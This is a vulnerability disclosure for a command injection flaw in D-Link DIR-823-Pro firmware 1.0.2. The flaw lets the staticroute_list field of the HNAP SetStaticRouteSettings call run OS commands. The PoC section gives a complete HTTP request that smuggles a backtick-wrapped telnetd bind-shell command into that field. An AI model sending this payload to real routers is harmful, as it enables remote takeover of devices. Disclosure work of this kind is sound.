# D-Link Vulnerability

Vendor:D-Link

Product:DIR-823-Pro

Version:1.0.2(Download Link:http://support.dlink.com.cn:9000/ProductInfo.aspx?m=DIR-823+Pro)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn



## Vulnerability description

We found an Command Injection vulnerability  in D-Link router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `prog.cgi` binary:

In `SetStaticRouteSettings` function, `staticroute_list` is directly passed by the attacker, so we can control the `staticroute_list` to attack the OS.

<div  align="center"><img src="./images/1.png" style="zoom:80%;" /></div>

Call the function `sub_437028`. As you can see here, the input has not been checked.

<div  align="center"><img src="./images/2.png" style="zoom:80%;" /></div>

In `libfcgi.so.0` binary:

Eventually, the initial input cause command injection.

<div  align="center"><img src="./images/3.png" style="zoom:80%;" /></div>

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.



## PoC

We set `staticroute_list` as **`telnetd -l /bin/sh -p 10000 -b 0.0.0.0`** , and the router will excute it,such as:

```http
POST /HNAP1/ HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
SOAPACTION: "http://purenetworks.com/HNAP1/SetStaticRouteSettings"
HNAP_AUTH: 467605C385FEA08A231B189A257C0B43 1642574003304
Content-Length: 130
Origin: http://192.168.100.1
Connection: close
Referer: http://192.168.100.1/Staticroute.html
Cookie: work_mode=router; uid=KjSsMz7d; PrivateKey=949353009C48F8BB4E0EA910F983FD20; timeout=218

{"SetStaticRouteSettings":{"staticroute_list":"192.168.1.1,255.255.255.255,192.168.0.1,`telnetd -l /bin/sh -p 10000 -b 0.0.0.0`"}}
```

<div  align="center"><img src="./images/4.png" style="zoom:80%;" /></div>



## Result

Get a shell!

<div  align="center"><img src="./images/5.png" style="zoom:80%;" /></div>
